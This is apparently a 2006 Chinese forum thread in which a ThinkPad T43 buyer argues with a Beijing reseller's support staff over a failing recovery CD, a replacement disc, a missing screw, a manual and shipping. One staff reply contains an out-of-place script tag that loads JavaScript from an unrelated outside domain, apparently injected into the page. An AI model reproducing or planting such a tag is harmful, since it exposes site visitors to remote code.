开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

关于恢复盘的问题?我的咋这样?

我的本本是72u,买来时XY已经把系统作成了中文的,出于好奇我用隐藏分区恢复到出厂状态,系统成了E文的,有点新鲜。但有好多XY中文系统没有安装的软件 比如杀毒的NORTON(3个月) IBM的DVD/CD刻录软件RecordNOW等等。用了两天,又出于好奇想把隐藏分区改成中文的,电话咨询了XY,说看论坛,于是上来找啊找,在销售版才找到,按照指示操作,如图:
请答复咋回事,谢谢。

盘子 1CD+1DVD

盘子 1CD+1DVD

CD启动后图像

CD启动后图像
盘花了
过来换一张
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

盘怎么会花,第一次用耶!?

再说我不在北京怎么过去换???
请XY注意:winpeoem.sif文件出错,但我在电脑中可以读出该文件!说明不是文件所在光盘物理损坏的问题。其次,此cd盘质量挺好 第一次使用,应该也不是盘片其它为止的损坏。所以不是盘片花了。

个人认为:是此文件本身于我的72U本本不相容的问题(注意文件名:..oem...)

本人并不想要XY再邮寄什么光盘,要不要这玩意儿也无所谓,可以在FTp上下载,不过XY提供的下载速度实在不敢恭维。

建议:XY检查一下此类光盘是否可以在其它的72U上启动。如果不行请修改FTP中的资料后,再通知我下载,谢谢!

顺便问一下,光盘制作出来的隐藏分区中是不是中文的操作系统?此光盘是不是其它T43中国行货的翻版?
是压制过程中的问题,里面的数据有错误,不是表面花了。。。。。。我是说里面的数据花了
现在是不是已经更改过来?
ftp服务器里的可以下载了吗?

请XY把我的ftp账号带宽改大几天,方便我下载,行吗?这样就不用再换盘了。
原帖由 qiiqii 于 2006-3-1 13:48 发表
现在是不是已经更改过来?
ftp服务器里的可以下载了吗?

请XY把我的ftp账号带宽改大几天,方便我下载,行吗?这样就不用再换盘了。

什么叫做售后服务?好歹答复一下啊!!!
盘坏了,换盘即可解决,所有T43都可以用这个盘
关于你在XP下可以读出来是因为XP的纠错功能较好,他会让光驱在较低速下运行,但是做这个系统的时候没有那么好的纠错功能,所以有问题,我们的盘已经做了上百个机器,都可以用,这个不用置疑

关于FTP上的内容也没有问题,这个盘需要只能再邮购了,因为无论是第一次用还是第几次用,盘都是1个月保换的.
原帖由 EddieFan 于 2006-3-2 21:01 发表
...这个盘需要只能再邮购了,因为无论是第一次用还是第几次用,盘都是1个月保换的.
...

非常×××地高速您 我的电脑是二月七日购买的二月九日邮寄到我手上的,不论怎么算 也不超过一个月。

这么说。。。保换。。。就是我把盘给你邮寄过去(邮费到付),然后您再给我换张盘邮回来?

呵呵。。。。。

是不是这样?

简单点的话,还是您直接邮给我得了。另外 如果您方便的话 把少我的中文说明书 一并邮给我
,非常感谢!!
另外 我的电脑怎么缺了个螺丝???(固定DVDRAM的) 疑惑。。。。。。。

关注...................................
等待中。。。。。
给我机器序列号,我查一下.

关于螺丝,那个是锁光驱的,所有机器底部都缺那么一个,看看别人的帖子和扫盲贴就清楚了
原帖由 EddieFan 于 2006-3-4 23:51 发表
给我机器序列号,我查一下.

关于螺丝,那个是锁光驱的,所有机器底部都缺那么一个,看看别人的帖子和扫盲贴就清楚了

真麻烦死了。。。

看这个:
http://www.xynbnb.com/viewthread ... highlight=%2Bqiiqii

或者这个
可以给你快递一个
那个螺丝在说明书的袋子里,ibm出场没有装她,是因为那个是热插拔的,如果你不想拔光驱可就可以拧上它

另外ftp并不是我开多大你就能下载多快
要看你那边的速度
谢谢。什么时间快递啊?

地址没变,还是上次你们用的
为什么还不恢复我?

处理速度这么慢!!~~~~
原帖由 qiiqii 于 2006-3-8 12:52 发表
为什么还不恢复我?

处理速度这么慢!!~~~~

你得告诉我你到底却不缺那个螺丝阿。。。。。
晕。螺丝无所谓了,我是没有看见,如果您不觉得麻烦就一起快递给我,谢谢!

另外 翔意的中文恢复盘 似乎版本比较早吧?2004年12月的?

有没有版本比较新一些的?如果有就快递给我新的好吗?再次谢谢!

顺便把少我的 中文说明书 一起 邮给我好吗?  再再一次谢谢!!!

我的光盘和书 快递了?

给句话摘。
顶到回复!!!
地址pm给我
原帖由 administrator 于 2006-3-11 14:19 发表
地址pm给我

不知道“pm”什么意思?是不是短消息?

已经通过短消息发送过去!

等待处理。。。。。。。

这种售后服务是不是太。。。。。。:(:(:(
已发出
以后有事请先打电话
这样比较快
已经九天过去了,平邮也该到了啊!!!!!

这算什么么?????????????????????????????
小红马快递
单号wl21051011

你那里太偏,可能慢点